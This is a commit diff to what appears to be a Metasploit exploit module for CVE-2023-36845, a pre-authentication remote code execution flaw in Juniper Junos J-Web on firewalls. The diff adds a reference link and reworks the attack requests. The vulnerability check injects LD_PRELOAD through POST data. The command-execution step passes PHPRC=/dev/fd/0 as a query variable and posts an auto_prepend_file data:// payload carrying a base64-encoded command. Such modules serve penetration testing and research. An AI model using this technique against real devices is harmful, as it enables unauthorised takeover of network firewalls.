Improved request sending and added watchtower ref

modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb

@@ -31,6 +31,7 @@ def initialize(info = {})
           'Ron Bowes'     # Target setup instructions
         ],
         'References' => [
+          [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'],
           [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],
           [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],
           [ 'CVE', '2023-36845']
@@ -55,9 +56,10 @@ def initialize(info = {})
 
   def check
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '?LD_PRELOAD=/tmp/ld'),
+      'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
-      'ctype' => 'application/x-www-form-urlencoded'
+      'ctype' => 'application/x-www-form-urlencoded',
+      'data' => 'LD_PRELOAD=/tmp/ld'
     )
 
     return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"')
@@ -70,10 +72,13 @@ def execute_command(cmd, _opts = {})
     post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(cmd)}\""
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '?PHPRC=/dev/fd/0'),
+      'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
       'data' => post_data.to_s,
-      'ctype' => 'application/x-www-form-urlencoded'
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        'PHPRC' => '/dev/fd/0'
+      }
     )
 
     print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res